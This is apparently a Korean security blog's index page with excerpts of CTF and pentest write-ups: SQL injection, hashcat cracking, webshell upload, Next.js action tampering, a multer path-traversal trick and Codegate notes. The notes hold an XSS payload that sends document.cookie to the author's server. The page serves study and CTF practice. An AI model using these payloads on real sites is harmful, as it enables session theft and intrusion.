본문 바로가기

전체 글

(163)
rev- llm 코드분석 시 프롬프트 You are an expert CTF player.Your task is to understand a function in a decompiled binary for a CTF challenge.The function consists of two steps:1. 8-bytes of user input are read into a buffer and treated as a 64-bit little-endian integer.2. This integer is manipulated in a series of arithmetic operations, to produce an XOR key.3. The XOR key is used to deobfuscate another part of memory.For now..
모의침투 공부 다음은 연습용 웹페이지에서 모의해킹 시나리오를 공부한 내용이다.먼저 웹페이지의 취약점을 찾아야하는데 다음처럼 union을 통한 sql injection 취약점이 있다.대학에서 모의해킹을 했을때는 여기서 취약점을 보고하고 끝이났지만 실무에선 더 깊게 나아간다. hashcat을 이용한 비밀번호 구하기hashcat -m 0 -a 0 hash값 rockyou.txt 비밀번호 구하기 성공(온라인의 HASH서비스를 이용할 경우 사용자의 개인정보를 웹에서 요청을 보낸 형태가 되기에 주의하자) 이제 구한 비밀번호로 관리자 로그인에 성공한 모습이후 관리자기능에서 사진파일 업로드 기능이 있는데 콘텐츠 타입 값을 변경해 웹쉘을 업로드한다. 인증 필요 ..
Breach CTF-web-Framework Follies 블라인드로 문제파일만 받아서 풀었기에 풀고나니 10솔브 문제였다 뭐든지 마음가짐이 중요한것같다.next.js의 지식이 부족하기에 문제는 정말 어려웠고 server.js도 라우팅도 모두 동적으로 해준다는것을 깨닫는데 시간이 조금 걸렸다.ioEYWhJqZO폴더에서 flag를 출력하는 함수와 이폴더의 페이지에서만 button클릭시 동작하는 부분이 있는것을 볼수있다.저함수를 실행시키는 방법을 찾는데 많은 시간을 사용했고 test버튼을 클릭시에 다음과 같이 통신하는것을 확인했고 codegate의 웹문제에서 action값을 변조시킨것처럼 이번에도 action을 바꾸면 될것같았다. /_next/static/chunks/app/ioEYWhJqZO/page-46ecf19b8ba66948.js경로에서 중요한 action ..
nodejs로 파일 업로드 필터링 우회 방법 https://huntr.com/bounties/92a875fe-c5b3-485c-b03f-d3185189e0b1AI 관련  1-day를 보던중 신기해서 찾아보았다. https://www.nodejs-security.com/learn/secure-file-handling/weak-multer-file-name-manipulation Weak Multer File Name Manipulation www.nodejs-security.com다음처럼 누가 정리해둔 취약점이다.file.originalname = Buffer.from(file.originalname, "latin1").toString("utf8")다음과같은 파일업로드시 파일명 및 경로를 처리하는 시스템이 있을때filename = "..丯..丯..丯..
dicectf-web-공부 cookie-recipes-v3bake시에 배열값을 number에 넣을경우 length조건을 우회하고 Number함수과정에서 배열을 문자열로 바꾸고 이를 숫자로 바꾸기에 cookie의 값이 오르게 되어 flag를 획득할수있게된다. pyramidreq.on부분을 비동기처리로 해당 패킷이 완료되기전에 token이 발급되는점을 이용해 비동기처리를 늘어트리고(HTTP 헤더만 전송 body 데이터는 일부로 보내지않고 end가 안되게유지시키고 recv를 통해 토큰만받아서 이용하면된다)) 받은 토큰을 이용해 추천인 코드를 발급받아 추천인코드에 유저체크는 없기에 자기자신을 계속해서 추천하면된다.(추천인과 정산버튼의 로직상 자기자신을 추천할경우를 고려안했기에 값이 기하급수적으로증가한다.)web-nobin먼저 messag..
Codegate2025-공부 1. hide-and-seek(web)https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps Digging for SSRF in NextJS appsAt Assetnote, we encounter sites running NextJS extremely often; in this blog post we will detail some common misconfigurations we find in NextJS websites, along with a vulnerability we found in the framework.www.assetnote.ioawait fetch를 통해 요청시 해당버전의 nextjs의 경우문제의 exter..
codegate 2025-Masquerade 1.터키어를 이용한 권한변경d760525e-a019-4dcc-a9bb-107768cbdec31234admın4aeadcf5-fd2c-4113-b0c1-6dbdd7d1aa641234ıNSPECTOR2.base tag를 이용한 내서버로 리다이렉트3. 내서버에서 admin/test페이지로 리다이렉트후 내서버로 다시 리다이렉트http://내서버ip/admin/test/?title=%3Cimg%20src=%22x%22%20onerror=%22location.href=%27http://내서버ip/codegate/%27%2bdocument.cookie%22%3E&content=b 분발해야겠다! 추가base태그 말고도 두가지방식이 더있었다.Dom clobbering- name을 통해 window.conf에 접근하면서 ..
GCP, 구글클라우드 서버운영 중 SSH 갑자기 접속이 안될때 구글클라우드를 통해 서버운영중에 갑자기 SSH접속이 계속 실패하는 현상이 있었고 SSH키 직접할당 등 여러 삽질 끝에  https://hyungin0505.tistory.com/61 [GCP] SSH authentication has failed 디스크 용량 부족으로 인한 SSH 접속 실패 해결2024-01-29 작성됨Ubuntu 20.04 LTSGoogle Cloud Platform Service 얼마 전 연재했던 GCP 마인크래프트 24시간 서버 열기의 연장선이라고 할 수 있겠다지금껏 서버에서 발생한 여러 가지 사소한 오류들을 해결해hyungin0505.tistory.com이블로그를 통해 해결했다. No space left on device세부정보에 직렬포트의 로그를 봤을때 똑같이 해당 구문이 있었고..